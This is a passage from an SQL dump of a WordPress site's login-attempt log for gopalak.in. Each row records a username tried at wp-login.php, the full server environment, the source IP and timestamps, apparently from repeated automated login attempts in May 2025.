bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51984\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746745590.1177709;s:12:\"REQUEST_TIME\";i:1746745590;}}','35.154.1.88',1,'2025-05-09 04:36:31','2025-05-10 07:10:32'),(94996,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51987\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746745590.12217;s:12:\"REQUEST_TIME\";i:1746745590;}}','35.154.1.88',1,'2025-05-09 04:36:31','2025-05-10 07:10:33'),(94997,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51988\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746745590.1221769;s:12:\"REQUEST_TIME\";i:1746745590;}}','35.154.1.88',1,'2025-05-09 04:36:31','2025-05-10 07:10:33'),(94998,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51989\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746745591.8124399;s:12:\"REQUEST_TIME\";i:1746745591;}}','35.154.1.88',1,'2025-05-09 04:36:33','2025-05-10 07:10:34'),(94999,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"95\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"32866\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.126.68\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746746163.3265779;s:12:\"REQUEST_TIME\";i:1746746163;}}','198.54.126.68',0,'2025-05-09 04:46:05','1970-01-01 00:00:00'),(95000,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39256\";s:11:\"REMOTE_ADDR\";s:12:\"31.172.67.59\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746746750.6042349;s:12:\"REQUEST_TIME\";i:1746746750;}}','31.172.67.59',0,'2025-05-09 04:55:52','1970-01-01 00:00:00'),(95001,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60266\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746746892.8278971;s:12:\"REQUEST_TIME\";i:1746746892;}}','35.154.1.88',1,'2025-05-09 04:58:15','2025-05-10 07:10:33'),(95002,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60267\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746746892.8289151;s:12:\"REQUEST_TIME\";i:1746746892;}}','35.154.1.88',1,'2025-05-09 04:58:15','2025-05-10 07:10:33'),(95003,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60269\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746746894.7384591;s:12:\"REQUEST_TIME\";i:1746746894;}}','35.154.1.88',1,'2025-05-09 04:58:16','2025-05-10 07:10:31'),(95004,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"120\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60265\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"120\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746746894.7395151;s:12:\"REQUEST_TIME\";i:1746746894;}}','35.154.1.88',1,'2025-05-09 04:58:16','2025-05-10 07:10:32'),(95005,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60270\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746746895.6813581;s:12:\"REQUEST_TIME\";i:1746746895;}}','35.154.1.88',1,'2025-05-09 04:58:17','2025-05-10 07:10:34'),(95006,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55487\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746748204.8311591;s:12:\"REQUEST_TIME\";i:1746748204;}}','35.154.1.88',1,'2025-05-09 05:20:07','2025-05-10 